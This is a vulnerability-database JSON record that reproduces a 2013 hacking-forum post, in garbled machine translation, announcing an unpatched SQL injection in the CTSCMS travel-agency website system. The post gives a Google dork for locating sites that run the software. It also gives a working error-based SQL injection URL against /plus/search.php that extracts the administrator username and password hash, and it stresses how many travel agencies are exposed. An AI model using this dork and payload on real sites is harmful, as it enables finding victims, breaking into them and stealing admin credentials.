DATABASE RESOURCES PRICING ABOUT US

{"viewCount": 3, "id": "MYHACK58:62201337079", "edition": 1, "reporter": "\u4f5a\u540d", "lastseen": "2016-10-30T10:59:01", "published": "2013-01-31T00:00:00", "bulletinFamily": "info", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "type": "myhack58", "modified": "2013-01-31T00:00:00", "title": "Travel website management system[CTSCMS]0day-vulnerability warning-the black bar safety net", "cvelist": [], "references": [], "cvss": {"vector": "NONE", "score": 0.0}, "description": "New Year's extra point 0day,small shared! \nChina travel service website management system CTSCMS, this site I recently found. The use of dedecms secondary development,weaving dreams of the kernel. Due to the neglect of the official system upgrade causes the program to have a lot of vulnerabilities. The recent burst of injection vulnerabilities are present,the history of the vulnerabilities don't know exists. \nGoogle: the 2002-2011 CTSCMS.COM that inurl:users/reg.php travel Agency \nPOC:/plus/search. php? keyword=as&typeArr[1 1 1%3D@`\\\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%2 3@__admin`+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@`\\\"+]=a\n\nLater I found,this set of programs is a person in the domestic many travel Agency website in with\n\n! [](/Article/UploadPic/2013-1/201313113204132863.gif)\n\nMany of the large travel Agency websites are used,please the law allows within the scope of the test. Hackers take care.....\n\n\n", "href": "http://www.myhack58.com/Article/html/3/62/2013/37079.htm", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645227971, "score": 1659769055}}

{}